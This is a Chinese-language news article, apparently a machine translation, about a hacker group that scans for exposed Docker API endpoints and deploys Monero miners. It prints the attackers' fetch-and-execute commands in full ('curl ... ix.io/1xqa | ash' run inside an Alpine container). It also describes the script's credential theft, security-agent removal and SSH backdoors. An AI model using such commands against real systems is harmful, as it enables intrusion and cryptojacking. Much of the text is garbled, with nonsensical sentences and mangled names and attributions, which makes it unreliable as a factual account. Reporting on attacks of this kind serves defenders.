“一个黑客组织正在利用暴露的API端点劫持Docker系统”

一家黑客组织目前正在寻找一个在网络上进行大规模扫描并在线发布api端点的docker平台。

这些扫描的目的是让黑客组织向docker实例发送命令，并在企业的docker实例中部署加密货币矿工，以便为该组织自身的利益筹集资金。

专业操作

这个特殊的大规模扫描操作始于11月24日周末，因其巨大的规模而很快出类拔萃。

bad packets llc首席研究负责人兼联合创始人troy mursch今天向zdnet表示: bad packets cti api的顾客将观察到曝光的docker实例的使用活动并不新鲜，而是频繁发生。

他说:“使这项运动与众不同的是，扫描活动大幅增加。 仅此而已，为了找到僵尸互联网的作用，值得进一步调查。

正如其他人指出的，[ 1，2 ]，请告诉我这不是你平均的脚本小子利用的尝试吗，mursch，谁发现了选举？ 这项运动投入了适度的能量，到目前为止，我们还没有完全分解它所做的所有事情。

检测出与公开的docker api端点进行比较的机会性大规模扫描活动。

这些扫描使用alpine linux映像创建容器，然后执行以下操作

指令执行比较有效载荷: ch root/mnt/bin/sh-c & # 39； curl-sl4t.CO/q 047蓝牙； '； # # threatintelpic.Twitter/vxszv 5s f1o

badpacketsreport(@bad_packets )，2019年11月25日

迄今为止我们知道的事情

迄今为止，据了解，受到这些攻击的组织目前正在扫描59，000多个ip互联网(互联网区块)，以寻找暴露的docker实例。

当组识别出暴露的主机时，攻击者使用api端点启动alpine linux os操作系统容器，并在其中运行以下命令:

chroot / mnt / bin / sh -c'； curl -sl4 ix.io/1xqa | ash

上述命令从攻击者的服务器下载bash脚本后执行。 这个脚本安装了经典的xmrrig密码货币矿工。 据mursch称，在这项运动开展两天后，黑客已经开采了14.82枚monero硬币( xmr )，略高于740美元。

此外，该恶意软件操作还带有自卫措施。

mursch不是该事件的原创，但感兴趣的功能之一是http:// ix [来自。 ]用] io / 1xqh下载的脚本卸载了已知的监视代理，并杀死了多个进程。

看这个脚本，你会发现黑客不仅禁用了安全产品，还关闭了ddg等竞争对手的密码货币挖矿僵尸互联网相关的lso流程。

mursch还发现了恶意脚本的功能，该脚本扫描受感染的主机，搜索rconfig配置文件，对其进行加密和盗窃，并将文件返回给该组的命令和控制服务器。

另外，sandfly security创始人craig h. rowland还在黑客被黑客攻击的容器上创建后门账户，使ssh密钥留在后面更容易访问，并远程控制所有感染的机器人

目前，mursch建议立即检查运行docker实例的客户和组织是否在互联网上公开了api端点，关闭端口，然后退出无法识别的执行容器。

本文：《“一个黑客组织正在利用暴露的API端点劫持Docker系统”》